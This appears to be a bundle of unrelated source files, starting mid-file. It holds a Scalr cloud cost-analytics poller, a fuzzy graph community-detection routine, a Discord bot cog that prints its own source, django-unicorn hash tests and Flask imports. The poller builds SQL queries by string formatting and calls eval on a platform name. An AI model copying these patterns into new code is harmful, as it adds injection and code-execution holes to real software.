async_result.kill()
msg = "platform: '{platform}', region: '{region}', envs_ids: {envs_ids}. Reason: timeout"
msg = msg.format(platform=cred.platform, region=region, envs_ids=cred.envs_ids)
LOG.warning(msg)
return result
def _cloudstack(cred):
try:
result = list()
api_key = cryptotool.decrypt_scalr(app.crypto_key, cred['api_key'])
secret_key = cryptotool.decrypt_scalr(app.crypto_key, cred['secret_key'])
api_url = cryptotool.decrypt_scalr(app.crypto_key, cred['api_url'])
url = urlparse.urlparse(api_url)
splitted_netloc = url.netloc.split(':')
host = splitted_netloc[0]
try:
port = splitted_netloc[1]
except:
port = 443 if url.scheme == 'https' else None
path = url.path
secure = url.scheme == 'https'
cls = get_driver(Provider.CLOUDSTACK)
driver = cls(key=api_key, secret=secret_key, host=host, port=port, path=path, secure=secure)
proxy_url = app.proxy_settings.get(cred.platform, {}).get('url')
driver.connection.set_http_proxy(proxy_url=proxy_url)
locations = driver.list_locations()
cloud_nodes = _libcloud_list_nodes(driver)
timestamp = int(time.time())
for location in locations:
nodes = list()
for cloud_node in cloud_nodes:
if cloud_node.state != NodeState.RUNNING or cloud_node.extra['zone_id'] != location.id:
continue
node = {
'instance_id': cloud_node.id,
'instance_type': cloud_node.extra['size_id'],
'os': None
}
nodes.append(node)
if nodes:
result.append(
{
'region': location.name,
'timestamp': timestamp,
'nodes': nodes
}
)
return result
except:
e = sys.exc_info()[1]
msg = "platform: '{platform}', envs_ids: {envs_ids}. Reason: {error}"
msg = msg.format(platform=cred.platform, envs_ids=cred.envs_ids,
error=helper.exc_info(where=False))
_handle_exception(e, msg)
def cloudstack(cred):
"""
:returns: list
[{'region': str, 'timestamp': int, 'nodes': list}]
"""
result = list()
app.pool.wait()
async_result = app.pool.apply_async(_cloudstack, args=(cred,))
gevent.sleep(0) # force switch
try:
result = async_result.get(timeout=app.config['cloud_connection_timeout'])
except gevent.timeout.Timeout:
async_result.kill()
msg = "platform: '{platform}', envs_ids: {envs_ids}. Reason: timeout"
msg = msg.format(platform=cred.platform, envs_ids=cred.envs_ids)
LOG.warning(msg)
return result
def idcf(cred):
"""
:returns: list
[{'region': str, 'timestamp': int, 'nodes': list}]
"""
return cloudstack(cred)
def _gce_key(cred):
if cred.get('json_key'):
key = json.loads(cryptotool.decrypt_scalr(app.crypto_key, cred['json_key']))['private_key']
else:
key = cryptotool.decrypt_scalr(app.crypto_key, cred['key'])
# convert pkcs12 to rsa
out, err, ret_code = helper.call(
"openssl pkcs12 -nodes -nocerts -passin pass:notasecret | openssl rsa",
input=binascii.a2b_base64(key),
shell=True
)
key = out.strip()
return key
def _gce_conn(cred, key=None):
service_account_name = cryptotool.decrypt_scalr(app.crypto_key, cred['service_account_name'])
if key is None:
key = _gce_key(cred)
credentials = ServiceAccountCredentials.from_p12_keyfile_buffer(
service_account_name,
StringIO.StringIO(key),
scopes=['https://www.googleapis.com/auth/compute']
)
http = httplib2.Http()
http = credentials.authorize(http)
return build('compute', 'v1', http=http), http
def _gce_zone(zone, key, cred):
try:
conn, http = _gce_conn(cred, key=key)
project_id = cryptotool.decrypt_scalr(app.crypto_key, cred['project_id'])
request = conn.instances().list(
project=project_id,
zone=zone,
filter='status eq RUNNING'
)
resp = request.execute(http=http)
timestamp = int(time.time())
cloud_nodes = resp['items'] if 'items' in resp else []
nodes = list()
for cloud_node in cloud_nodes:
node = {
'instance_id': cloud_node['id'],
'server_name': cloud_node['name'],
'instance_type': cloud_node['machineType'].split('/')[-1],
'os': None,
}
for item in cloud_node['metadata'].get('items', []):
meta = dict(tuple(element.split('=', 1))
for element in item['value'].split(';') if '=' in element)
if 'serverid' in meta:
node['server_id'] = meta['serverid']
if 'env_id' in meta:
node['env_id'] = int(meta['env_id'])
break
nodes.append(node)
return {
'region': zone,
'timestamp': timestamp,
'nodes': nodes
} if nodes else dict()
except:
e = sys.exc_info()[1]
msg = "platform: '{platform}', zone: '{zone}', envs_ids: {envs_ids}. Reason: {error}"
msg = msg.format(platform=cred.platform, zone=zone, envs_ids=cred.envs_ids,
error=helper.exc_info(where=False))
_handle_exception(e, msg)
def gce(cred):
"""
:returns: list
[{'region': str, 'timestamp': int, 'nodes': list}]
"""
result = list()
project_id = cryptotool.decrypt_scalr(app.crypto_key, cred['project_id'])
key = _gce_key(cred)
conn, http = _gce_conn(cred, key=key)
request = conn.zones().list(project=project_id)
resp = request.execute(http=http)
zones = [_['name'] for _ in resp['items']] if 'items' in resp else []
app.pool.wait()
async_results = dict(
(zone, app.pool.apply_async(_gce_zone, args=(zone, key, cred,)))
for zone in zones
)
gevent.sleep(0) # force switch
for zone, async_result in async_results.iteritems():
try:
zone_nodes = async_result.get(timeout=app.config['cloud_connection_timeout'] + 1)
if zone_nodes:
result.append(zone_nodes)
except gevent.timeout.Timeout:
async_result.kill()
msg = "platform: '{platform}', zone: '{zone}', envs_ids: {envs_ids}. Reason: timeout"
msg = msg.format(platform=cred.platform, zone=zone, envs_ids=cred.envs_ids)
LOG.warning(msg)
return result
def _openstack_cred(cred):
username = cryptotool.decrypt_scalr(app.crypto_key, cred['username'])
if 'password' in cred:
password = cryptotool.decrypt_scalr(app.crypto_key, cred['password'])
auth_version = '2.0_password'
else:
password = cryptotool.decrypt_scalr(app.crypto_key, cred['api_key'])
auth_version = '2.0_apikey'
keystone_url = cryptotool.decrypt_scalr(app.crypto_key, cred['keystone_url'])
if not keystone_url.rstrip('/').endswith('/tokens'):
keystone_url = os.path.join(keystone_url, 'tokens')
if 'tenant_name' in cred:
tenant_name = cryptotool.decrypt_scalr(app.crypto_key, cred['tenant_name'])
else:
tenant_name = None
return username, password, auth_version, keystone_url, tenant_name
def _openstack_region(provider, service_name, region, cred):
try:
username, password, auth_version, keystone_url, tenant_name = _openstack_cred(cred)
url = urlparse.urlparse(keystone_url)
service_type = 'compute'
cls = get_driver(provider)
driver = cls(
username,
password,
ex_force_auth_url=url.geturl(),
ex_tenant_name=tenant_name,
ex_force_auth_version=auth_version,
ex_force_service_region=region,
ex_force_service_type=service_type,
ex_force_service_name=service_name,
)
proxy_url = app.proxy_settings.get(cred.platform, {}).get('url')
driver.connection.set_http_proxy(proxy_url=proxy_url)
cloud_nodes = _libcloud_list_nodes(driver)
try:
cloud_nodes = [node for node in cloud_nodes
if node.driver.region.upper() == region.upper()]
except AttributeError:
pass
timestamp = int(time.time())
nodes = list()
for cloud_node in cloud_nodes:
if cloud_node.state != NodeState.RUNNING:
continue
node = {
'instance_id': cloud_node.id,
'instance_type': cloud_node.extra['flavorId'],
'os': None
}
nodes.append(node)
return {
'region': region,
'timestamp': timestamp,
'nodes': nodes
} if nodes else dict()
except:
e = sys.exc_info()[1]
msg = (
"platform: '{platform}', envs_ids: {envs_ids}, url: '{url}', "
"tenant_name: '{tenant_name}', service_name='{service_name}', "
"region: '{region}', auth_version: {auth_version}. Reason: {error}")
msg = msg.format(
platform=cred.platform, envs_ids=cred.envs_ids, url=url, tenant_name=tenant_name,
service_name=service_name, region=region, auth_version=auth_version,
error=helper.exc_info(where=False))
_handle_exception(e, msg)
def _openstack(provider, cred):
result = list()
username, password, auth_version, keystone_url, tenant_name = _openstack_cred(cred)
url = urlparse.urlparse(keystone_url)
cls = get_driver(provider)
driver = cls(
username,
password,
ex_force_auth_url=url.geturl(),
ex_force_base_url='%s://%s' % (url.scheme, url.netloc),
ex_tenant_name=tenant_name,
ex_force_auth_version=auth_version,
)
proxy_url = app.proxy_settings.get(cred.platform, {}).get('url')
driver.connection.set_http_proxy(proxy_url=proxy_url)
service_catalog = _libcloud_get_service_catalog(driver)
service_names = service_catalog.get_service_names(service_type='compute')
regions = service_catalog.get_regions(service_type='compute')
for service_name in service_names:
app.pool.wait()
async_results = dict(
(
region,
app.pool.apply_async(
_openstack_region,
args=(provider, service_name, region, cred)
)
) for region in regions
)
gevent.sleep(0) # force switch
for region, async_result in async_results.iteritems():
try:
region_nodes = async_result.get(timeout=app.config['cloud_connection_timeout'] + 1)
if region_nodes:
result.append(region_nodes)
except gevent.timeout.Timeout:
async_result.kill()
msg = (
"platform: '{platform}', envs_ids: {envs_ids}, url: '{url}', "
"tenant_name: '{tenant_name}', service_name='{service_name}', "
"region: '{region}', auth_version: {auth_version}. Reason: timeout")
msg = msg.format(
platform=cred.platform, envs_ids=cred.envs_ids, url=url, tenant_name=tenant_name,
service_name=service_name, region=region, auth_version=auth_version)
LOG.warning(msg)
return result
def openstack(cred):
"""
:returns: list
[{'region': str, 'timestamp': int, 'nodes': list}]
"""
return _openstack(Provider.OPENSTACK, cred)
def rackspacenguk(cred):
"""
:returns: list
[{'region': str, 'timestamp': int, 'nodes': list}]
"""
return _openstack(Provider.RACKSPACE, cred)
def rackspacengus(cred):
"""
:returns: list
[{'region': str, 'timestamp': int, 'nodes': list}]
"""
return _openstack(Provider.RACKSPACE, cred)
def ocs(cred):
"""
:returns: list
[{'region': str, 'timestamp': int, 'nodes': list}]
"""
return _openstack(Provider.OPENSTACK, cred)
def nebula(cred):
"""
:returns: list
[{'region': str, 'timestamp': int, 'nodes': list}]
"""
return _openstack(Provider.OPENSTACK, cred)
def mirantis(cred):
"""
:returns: list
[{'region': str, 'timestamp': int, 'nodes': list}]
"""
return _openstack(Provider.OPENSTACK, cred)
def vio(cred):
"""
:returns: list
[{'region': str, 'timestamp': int, 'nodes': list}]
"""
return _openstack(Provider.OPENSTACK, cred)
def verizon(cred):
"""
:returns: list
[{'region': str, 'timestamp': int, 'nodes': list}]
"""
return _openstack(Provider.OPENSTACK, cred)
def cisco(cred):
"""
:returns: list
[{'region': str, 'timestamp': int, 'nodes': list}]
"""
return _openstack(Provider.OPENSTACK, cred)
def sort_nodes(cloud_data, cred, envs_ids):
platform = cred.platform
# gce
if platform == 'gce':
query = (
"SELECT server_id "
"FROM servers_history "
"WHERE server_id IN ({})"
)
for region_data in cloud_data:
region_data['managed'] = list()
region_data['not_managed'] = list()
servers_ids = [str(node['server_id']) for node in
region_data['nodes'] if node.get('server_id')]
if servers_ids:
results = [result['server_id'] for result in
app.scalr_db.execute(query.format(str(servers_ids)[1:-1]))]
else:
results = []
for node in region_data['nodes']:
if node.get('server_id') and node['server_id'] in results and node['env_id'] in envs_ids:
region_data['managed'].append(node)
else:
region_data['not_managed'].append(node)
del region_data['nodes']
return cloud_data
# all platforms exclude gce
url_key = analytics.url_key_map[platform]
url = cred[url_key] if url_key else ''
for region_data in cloud_data:
cloud_location = region_data['region']
for chunk in helper.chunks(region_data['nodes'], 200):
app.analytics.get_server_id_by_instance_id(chunk, platform, cloud_location,
envs_ids=envs_ids, url=url)
region_data['managed'] = list()
region_data['not_managed'] = list()
for node in region_data['nodes']:
if 'server_id' in node:
region_data['managed'].append(node)
else:
region_data['not_managed'].append(node)
del region_data['nodes']
return cloud_data
def sorted_data_update(sorted_data):
for region_data in sorted_data:
for server in region_data['managed']:
if server.get('os', None) is not None:
continue
query = (
"SELECT os_type os "
"FROM servers "
"WHERE server_id='{server_id}'"
).format(server_id=server['server_id'])
result = app.scalr_db.execute(query, retries=1)
if not result:
query = (
"SELECT value AS os "
"FROM server_properties "
"WHERE server_id='{server_id}' "
"AND name='os_type'"
).format(server_id=server['server_id'])
result = app.scalr_db.execute(query, retries=1)
if not result:
server['os'] = 'linux'
msg = "Can't detect OS type for server: {0}, set 'linux'".format(
server['server_id'])
LOG.warning(msg)
else:
server['os'] = result[0]['os']
for server in region_data['managed']:
server['os'] = analytics.os_map[server.get('os', None)]
for server in region_data['not_managed']:
server['os'] = analytics.os_map[server.get('os', None)]
def db_update(sorted_data, envs_ids, cred):
platform = cred.platform
for env_id in envs_ids:
query = (
"SELECT client_id "
"FROM client_environments "
"WHERE id={env_id}"
).format(env_id=env_id)
results = app.scalr_db.execute(query, retries=1)
account_id = results[0]['client_id']
for region_data in sorted_data:
try:
# skip if managed servers not exist
if not region_data['managed']:
continue
sid = uuid.uuid4()
if platform == 'ec2':
cloud_account = cred.get('account_id')
else:
cloud_account = None
if analytics.url_key_map[platform]:
url = urlparse.urlparse(cryptotool.decrypt_scalr(
app.crypto_key, cred[analytics.url_key_map[platform]]).rstrip('/'))
url = '%s%s' % (url.netloc, url.path)
else:
url = ''
query = (
"INSERT IGNORE INTO poller_sessions "
"(sid, account_id, env_id, dtime, platform, url, cloud_location, cloud_account) "
"VALUES "
"(UNHEX('{sid}'), {account_id}, {env_id}, '{dtime}', '{platform}', '{url}',"
"'{cloud_location}', '{cloud_account}')"
).format(
sid=sid.hex, account_id=account_id, env_id=env_id,
dtime=time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(region_data['timestamp'])),
platform=platform, url=url, cloud_location=region_data['region'],
cloud_account=cloud_account
)
app.analytics_db.execute(query, retries=1)
# managed
for managed in region_data['managed']:
if managed['env_id'] != env_id:
continue
query = (
"INSERT IGNORE INTO managed "
"(sid, server_id, instance_type, os) VALUES "
"(UNHEX('{sid}'), UNHEX('{server_id}'), '{instance_type}', {os})"
).format(
sid=sid.hex,
server_id=uuid.UUID(managed['server_id']).hex,
instance_type=managed['instance_type'],
os=managed['os'])
app.analytics_db.execute(query, retries=1)
except:
helper.handle_error(message='Database update failed')
def process_credential(cred, envs_ids=None):
if envs_ids is None:
envs_ids = [cred.envs_ids]
try:
analytics.Credentials.test(cred, cred.platform)
cloud_data = eval(cred.platform)(cred)
msg = "platform: '{}', envs_ids: {}, cloud data: {}"
msg = msg.format(cred.platform, envs_ids, cloud_data)
LOG.debug(msg)
if cloud_data:
sorted_data = sort_nodes(cloud_data, cred, envs_ids)
sorted_data_update(sorted_data)
db_update(sorted_data, envs_ids, cred)
except:
e = sys.exc_info()[1]
msg = "platform: '{platform}', environments: {envs}. Reason: {error}"
msg = msg.format(platform=cred.platform, envs=envs_ids, error=helper.exc_info(where=False))
_handle_exception(e, msg)
class AnalyticsPoller(application.ScalrIterationApplication):
def __init__(self, argv=None):
self.description = "Scalr Cost Analytics poller application"
super(AnalyticsPoller, self).__init__(argv=argv)
self.config['connections'].update({
'analytics': {
'user': None,
'pass': None,
'host': None,
'port': 3306,
'name': None,
'pool_size': 50,
},
})
self.config.update({
'pool_size': 100,
'interval': 300,
'cloud_connection_timeout': 10
})
self.scalr_db = None
self.analytics_db = None
self.analytics = None
self.pool = None
self.crypto_key = None
self.proxy_settings = {}
def set_proxy(self):
self.proxy_settings = {platform: helper.get_proxy_settings(self.scalr_config, platform)
for platform in analytics.PLATFORMS}
def configure(self):
enabled = self.scalr_config.get('analytics', {}).get('enabled', False)
if not enabled:
sys.stdout.write('Analytics is disabled. Exit\n')
sys.exit(0)
helper.update_config(
self.scalr_config.get('analytics', {}).get('connections', {}).get('scalr', {}),
self.config['connections']['mysql'])
helper.update_config(
self.scalr_config.get('analytics', {}).get('connections', {}).get('analytics', {}),
self.config['connections']['analytics'])
helper.update_config(
self.scalr_config.get('analytics', {}).get('poller', {}),
self.config)
helper.validate_config(self.config)
self.config['pool_size'] = max(11, self.config['pool_size'])
self.iteration_timeout = self.config['interval'] - self.error_sleep
crypto_key_path = os.path.join(os.path.dirname(self.args['--config']), '.cryptokey')
self.crypto_key = cryptotool.read_key(crypto_key_path)
self.scalr_db = dbmanager.ScalrDB(self.config['connections']['mysql'])
self.analytics_db = dbmanager.ScalrDB(self.config['connections']['analytics'])
self.analytics = analytics.Analytics(self.scalr_db, self.analytics_db)
self.pool = helper.GPool(pool_size=self.config['pool_size'])
self.set_proxy()
socket.setdefaulttimeout(self.config['instances_connection_timeout'])
def do_iteration(self):
for envs in self.analytics.load_envs():
msg = "Processing environments: {}".format([env['id'] for env in envs])
LOG.debug(msg)
try:
self.analytics.load_env_credentials(envs)
unique = {}
for env in envs:
try:
credentials = self.analytics.get_credentials([env])
for cred in credentials:
if cred.platform == 'ec2' and env.get('ec2.detailed_billing.enabled', '0') == '1':
continue
unique.setdefault(cred.unique, {'envs_ids': [], 'cred': cred})
unique[cred.unique]['envs_ids'].append(env['id'])
except:
msg = 'Processing environment: {} failed'.format(env['id'])
LOG.exception(msg)
for data in unique.values():
while len(self.pool) > self.config['pool_size'] * 5 / 10:
gevent.sleep(0.1)
self.pool.apply_async(process_credential,
args=(data['cred'],),
kwds={'envs_ids': data['envs_ids']})
gevent.sleep(0) # force switch
except:
msg = 'Processing environments: {} failed'.format([env['id'] for env in envs])
LOG.exception(msg)
self.pool.join()
def on_iteration_error(self):
self.pool.kill()
def main():
global app
app = AnalyticsPoller()
try:
app.load_config()
app.configure()
app.run()
except exceptions.AlreadyRunningError:
LOG.info(helper.exc_info())
except (SystemExit, KeyboardInterrupt):
pass
except:
LOG.exception('Oops')
if __name__ == '__main__':
main()
|
import numpy as np
import networkx as nx
from collections import defaultdict
"""
Reference implementation
https://github.com/nidhisridhar/Fuzzy-Community-Detection
"""
def __reachable(i, theta_cores, fuzz_d, visited):
# Returns indices of cores(in theta_cores) that are reachable from theta_cores[ i ]
reach = []
flag = True
index = -1
num_cores = len(theta_cores)
while flag:
if index == len(reach):
flag = False
if index == -1:
flag = False
for j in range(num_cores):
if visited[j] == 0 and i != j:
if fuzz_d[theta_cores[i]][theta_cores[j]] > 0:
visited[j] = 1
reach.append(j)
flag = True
else:
for j in range(num_cores):
if visited[j] == 0 and index != j:
if fuzz_d[theta_cores[index]][theta_cores[j]] > 0:
visited[j] = 1
reach.append(j)
flag = True
index += 1
return np.array(reach)
def __gran_embed(core, c, fuzz_d):
# Return Normalized Granular Embeddedness of theta-core with community C
num = 0
den = 0
c = np.array(c)
c = np.append(c, core)
n = len(fuzz_d[0])
for i in range(n):
num += np.min(fuzz_d[c, i])
den += np.max(fuzz_d[c, i])
return float(num) / den
def fuzzy_comm(graph, theta, eps, r):
"""
Takes adjacency_mat(n*n) , theta , eps (epsilon) , and radius(r)
and returns an n*c matrix where c is the number of communities and the
i,jth value is the membership of node i in community j
:param graph: networkx graph
:param theta:
:param eps:
:param r:
:return:
"""
adjacency_mat = nx.to_numpy_matrix(graph)
theta_cores = []
num_vertices = adjacency_mat.shape[0]
# Fuzzy granule initialization
# gran = [i for i in range(num_vertices)]
# Calculate distance between all vertices
dist = list(nx.all_pairs_shortest_path_length(graph))
# Membership values between all nodes
fuzz_d = np.zeros(shape=adjacency_mat.shape).astype(float)
for i in range(num_vertices):
nid, n_dist = dist[i]
for j in graph.nodes():
if j in n_dist and n_dist[j] <= r:
fuzz_d[nid][j] = 1 / float(1 + n_dist[j])
_sum = np.sum(fuzz_d, axis=1)
# Normalization of Membership
for i in range(num_vertices):
fuzz_d[i] = fuzz_d[i] / float(_sum[i])
# Theta-cores Finding
for i in range(num_vertices):
if np.sum(fuzz_d[:, i]) >= theta:
theta_cores.append(i)
theta_cores = np.array(theta_cores)
num_cores = len(theta_cores)
_sum = np.sum(fuzz_d[:, theta_cores], axis=1)
k = 0
for i in range(num_vertices):
fuzz_d[i] = fuzz_d[i] / _sum[k]
k += 1
# Finding Fuzzy Communities
communities = []
visited = np.zeros(num_cores)
for i in range(num_cores):
if visited[i] == 0:
c = [theta_cores[i]]
visited[i] = 1
reach = __reachable(i, theta_cores, fuzz_d, visited.copy())
for core_ind in reach:
if __gran_embed(theta_cores[core_ind], c, fuzz_d) > eps:
c.append(theta_cores[core_ind])
visited[core_ind] = 1
communities.append(c)
cms = []
for c in communities:
cms.append([int(n) for n in c])
# fuzzy association to communities
fuzz_assoc = defaultdict(dict)
for i in range(num_vertices):
for j in range(len(cms)):
fuzz_assoc[i][j] = np.sum(fuzz_d[i, cms[j]])
return cms, fuzz_assoc
|
import logging
import os
from dataclasses import dataclass
from threading import Event
from typing import List
import discord
import discord.ext.commands as commands
from bot.consts import Colors
from bot.bot_secrets import BotSecrets
import bot.extensions as ext
from bot.consts import Colors
from bot.messaging.events import Events
from bot.utils.displayable_path import DisplayablePath
log = logging.getLogger(__name__)
@dataclass
class FilePaths:
absolute: str
relative: str
class SourceCodeCog(commands.Cog):
"""
A cog to allow the bot to print its own source code given a file name
"""
def __init__(self, bot) -> None:
self.bot = bot
self.bot_files = {}
self.ignored = ['Logs', 'venv', '__pycache__', 'database', '.git', '.pytest_cache', 'bot_env.env']
self.repo_url = BotSecrets.get_instance().github_url
root = os.getcwd()
root_dir = root.split('/')[-1]
for root, dirs, files in os.walk(root, topdown= True):
dirs[:] = [d for d in dirs if not d.startswith('.')]
if not any(folder in f'{root}/' for folder in self.ignored):
for f in files:
path = os.path.join(root, f)
self.bot_files[f] = FilePaths(path, path.split(root_dir)[1])
@ext.group(case_insensitive=True, invoke_without_command= True)
@ext.long_help(
"""
Links the bots repository or optionally a specicifc file within the bots source tree
"""
)
@ext.short_help('Links the bots source repo')
@ext.example(('source', 'source clem_bot.py'))
async def source(self, ctx, file: str=None):
if not file:
embed = discord.Embed(title='Heres my source repository',
color=Colors.ClemsonOrange,
description=f'Feel free to contribute :grin:')
embed.add_field(name='Link', value=f'[Source]({self.repo_url})')
embed.set_thumbnail(url='https://github.githubassets.com/images/modules/logos_page/GitHub-Mark.png')
await ctx.send(embed=embed)
return
relative_url = self.bot_files[file].relative
gh_url = f'{self.repo_url}/tree/master{relative_url}'
embed = discord.Embed(title=f'Heres the source for {file}',
color=Colors.ClemsonOrange,
description=f'Feel free to contribute :grin:')
embed.add_field(name='Link', value=f'[Source]({gh_url})')
embed.set_thumbnail(url='https://github.githubassets.com/images/modules/logos_page/GitHub-Mark.png')
await ctx.send(embed=embed)
@source.command(aliases=['directory', 'tree'])
@ext.long_help(
"""
Prints out the bots full source directory structure in discord, you may use this to know what
files the source command has access too
"""
)
@ext.short_help('Prints the source directory')
@ext.example('source list')
async def list(self, ctx):
file_tree = self.list_files(os.getcwd(), self.ignored)
sent_messages = []
for chunk in self.chunk_iterable(file_tree, 1980):
sent_messages.append(await ctx.send(f'```yaml\n{chunk}```'))
await self.bot.messenger.publish(Events.on_set_deletable,
msg=sent_messages,
author=ctx.author)
@source.command(aliases=['show'])
@ext.long_help(
'Prints the contents of a specified source file directly into discord, optionally allows you to specify the start and'
'ending line numbers to narrow down what you display, if you only provide one number the'
'command will print from that number to the end of the file'
)
@ext.short_help('Displays a source file directly in discord')
@ext.example(('source print __main__.py', 'source print __main__.py 10 20'))
async def print(self, ctx, file: str = None, line_start: int = None, line_stop: int = None):
if file == 'BotSecrets.json' or file == 'bot_env.env':
embed = discord.Embed(title= f'Error: Restricted access', color= Colors.Error)
await ctx.send(embed= embed)
return
else:
file = file.replace('\\', '')
file = file.replace('`', '')
if line_start is not None and line_stop is not None:
if line_start >= line_stop:
embed = discord.Embed(title= f'Error: Line numbers are invalid', color= Colors.Error)
await ctx.send(embed= embed)
return
try:
open(self.bot_files[file].absolute)
except (FileNotFoundError, KeyError):
embed = discord.Embed(title= f'Error: File {file} not found', color= Colors.Error)
await ctx.send(embed= embed)
return
with open(self.bot_files[file].absolute) as f:
source = f.read()
if not source:
return
if line_stop is not None and len(source.splitlines()) < line_stop:
embed = discord.Embed(title= f'Error: End line number too high', color= Colors.Error)
await ctx.send(embed= embed)
return
formatted_source = self.process_source(source, line_start, line_stop)
total_chars = 0
source_with_length = []
#this creates a list of tuples (str, int) where the [1] index is the
#total character length of the source thus far
for line in formatted_source:
total_chars = total_chars + len(line)
source_with_length.append((line, total_chars))
#this walks the length list and breaks it into chunks based on
#the total char length thusfar
break_point_increment = 1800
break_point = break_point_increment
chunks_to_send = []
temp_list = []
for _, value in enumerate(source_with_length):
if value[1] < break_point:
#we havent reached the message char limit, keep going
temp_list.append(value[0])
else:
#we hit the limit, stop and append to the chunk list
chunks_to_send.append('\n'.join(temp_list))
#clear the temp list and append the current line in the new
#chunk so we dont lose it
temp_list.clear()
temp_list.append(value[0])
#increment the breakpoint so we know where the next chunk should end
break_point += break_point_increment
#we enumerated over the whole list, append whats left to the chunks to send list
chunks_to_send.append('\n'.join(temp_list))
#loop over the chunks and send them one by one with correct python formatting
sent_messages = []
for chunk in chunks_to_send:
backslash = '\\'
msg = await ctx.send(f"```py\n{chunk.replace('`', f'{backslash}`')}```")
sent_messages.append(msg)
await self.bot.messenger.publish(Events.on_set_deletable, msg=sent_messages, author=ctx.author)
def chunk_iterable(self, iterable, chunk_size):
for i in range(0, len(iterable), chunk_size):
yield iterable[i:i + chunk_size]
def process_source(self, source: str, line_start: int = None, line_stop: int = None):
split_source = [f'{i+1:03d} | {value}' for i, value in enumerate(source.splitlines())]
if line_start and line_start <= 0:
line_start = 1
filtered_source = split_source[line_start-1 if line_start else 0: line_stop or len(source)]
return filtered_source
def list_files(self, startpath, to_ignore: List[str]) -> str:
paths = DisplayablePath.get_tree(startpath, criteria=
lambda s: not any(i in s.parts for i in to_ignore))
return paths
def setup(bot):
bot.add_cog(SourceCodeCog(bot))
|
import shortuuid
from django_unicorn.utils import generate_checksum
from tests.views.fake_components import FakeComponent
from tests.views.message.test_calls import FakeCallsComponent
from tests.views.message.utils import post_and_get_response
def test_message_hash_no_change(client):
component_id = shortuuid.uuid()[:8]
component = FakeComponent(
component_id=component_id,
component_name="tests.views.fake_components.FakeComponent",
)
rendered_content = component.render()
hash = generate_checksum(rendered_content)
data = {"method_count": 0}
response = post_and_get_response(
client,
url="/message/tests.views.fake_components.FakeComponent",
data=data,
action_queue=[
{
"payload": {"name": "test_method_kwargs(count=0)"},
"type": "callMethod",
}
],
component_id=component_id,
hash=hash,
)
assert response.status_code == 304
def test_message_hash_changes(client):
component_id = shortuuid.uuid()[:8]
component = FakeComponent(
component_id=component_id,
component_name="tests.views.fake_components.FakeComponent",
)
rendered_content = component.render()
hash = generate_checksum(rendered_content)
data = {"method_count": 0}
response = post_and_get_response(
client,
url="/message/tests.views.fake_components.FakeComponent",
data=data,
action_queue=[
{
"payload": {"name": "test_method_kwargs(count=1)"},
"type": "callMethod",
}
],
component_id=component_id,
hash=hash,
)
assert response["data"]["method_count"] == 1
def test_message_hash_no_change_but_return_value(client):
component_id = shortuuid.uuid()[:8]
component = FakeComponent(
component_id=component_id,
component_name="tests.views.fake_components.FakeComponent",
)
rendered_content = component.render()
hash = generate_checksum(rendered_content)
data = {"method_count": 0}
response = post_and_get_response(
client,
url="/message/tests.views.fake_components.FakeComponent",
data=data,
action_queue=[
{
"payload": {"name": "test_return_value"},
"type": "callMethod",
}
],
component_id=component_id,
hash=hash,
)
# check that the response is JSON and not a 304
assert isinstance(response, dict)
assert response["return"]["value"]
def test_message_hash_no_change_but_return_redirect(client):
component_id = shortuuid.uuid()[:8]
component = FakeComponent(
component_id=component_id,
component_name="tests.views.fake_components.FakeComponent",
)
rendered_content = component.render()
hash = generate_checksum(rendered_content)
data = {"method_count": 0}
response = post_and_get_response(
client,
url="/message/tests.views.fake_components.FakeComponent",
data=data,
action_queue=[
{
"payload": {"name": "test_redirect"},
"type": "callMethod",
}
],
component_id=component_id,
hash=hash,
)
# check that the response is JSON and not a 304
assert isinstance(response, dict)
assert response["return"]["value"]
def test_message_hash_no_change_but_return_hash_update(client):
component_id = shortuuid.uuid()[:8]
component = FakeComponent(
component_id=component_id,
component_name="tests.views.fake_components.FakeComponent",
)
rendered_content = component.render()
hash = generate_checksum(rendered_content)
data = {"method_count": 0}
response = post_and_get_response(
client,
url="/message/tests.views.fake_components.FakeComponent",
data=data,
action_queue=[
{
"payload": {"name": "test_hash_update"},
"type": "callMethod",
}
],
component_id=component_id,
hash=hash,
)
# check that the response is JSON and not a 304
assert isinstance(response, dict)
assert response["return"]["value"]
def test_message_hash_no_change_but_return_poll_update(client):
component_id = shortuuid.uuid()[:8]
component = FakeComponent(
component_id=component_id,
component_name="tests.views.fake_components.FakeComponent",
)
rendered_content = component.render()
hash = generate_checksum(rendered_content)
data = {"method_count": 0}
response = post_and_get_response(
client,
url="/message/tests.views.fake_components.FakeComponent",
data=data,
action_queue=[
{
"payload": {"name": "test_poll_update"},
"type": "callMethod",
}
],
component_id=component_id,
hash=hash,
)
# check that the response is JSON and not a 304
assert isinstance(response, dict)
assert response["return"]["value"]
def test_message_hash_no_change_but_return_location_update(client):
component_id = shortuuid.uuid()[:8]
component = FakeComponent(
component_id=component_id,
component_name="tests.views.fake_components.FakeComponent",
)
rendered_content = component.render()
hash = generate_checksum(rendered_content)
data = {"method_count": 0}
response = post_and_get_response(
client,
url="/message/tests.views.fake_components.FakeComponent",
data=data,
action_queue=[
{
"payload": {"name": "test_refresh_redirect"},
"type": "callMethod",
}
],
component_id=component_id,
hash=hash,
)
# check that the response is JSON and not a 304
assert isinstance(response, dict)
assert response["return"]["value"]
def test_message_hash_no_change_but_calls(client):
component_id = shortuuid.uuid()[:8]
component = FakeCallsComponent(
component_id=component_id,
component_name="tests.views.message.test_calls.FakeCallsComponent",
)
rendered_content = component.render()
hash = generate_checksum(rendered_content)
data = {}
response = post_and_get_response(
client,
url="/message/tests.views.message.test_calls.FakeCallsComponent",
data=data,
action_queue=[
{
"payload": {"name": "test_call"},
"type": "callMethod",
}
],
component_id=component_id,
hash=hash,
)
# check that the response is JSON and not a 304
assert isinstance(response, dict)
assert response.get("calls") == [{"args": [], "fn": "testCall"}]
|
# Copyright [2020] [Two Six Labs, LLC]
# Licensed under the Apache License, Version 2.0
import importlib
import os
from types import MappingProxyType
from flask import Flask
from sqlalchemy.engine.url import URL
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy import create_engine
from flask_sqlalchemy import SQLAlchemy
from controller import create_labels_for_available_pages, make_pages_dict
from utility.constants import (
APP_CONFIG_JSON,
AVAILABLE_PAGES,
CONFIG_FILE_FOLDER,
AVAILABLE_PAGES_DICT,
DATA_BACKEND,
POSTGRES,
SQLALCHEMY_DATABASE_URI,
DEVELOPMENT,
)
from app_deploy_data.app_settings import DATABASE_CONFIG
from version import VERSION
from views.dashboard import dashboard_blueprint
from views.file_upload import upload_blueprint
from views.admin import admin_blueprint
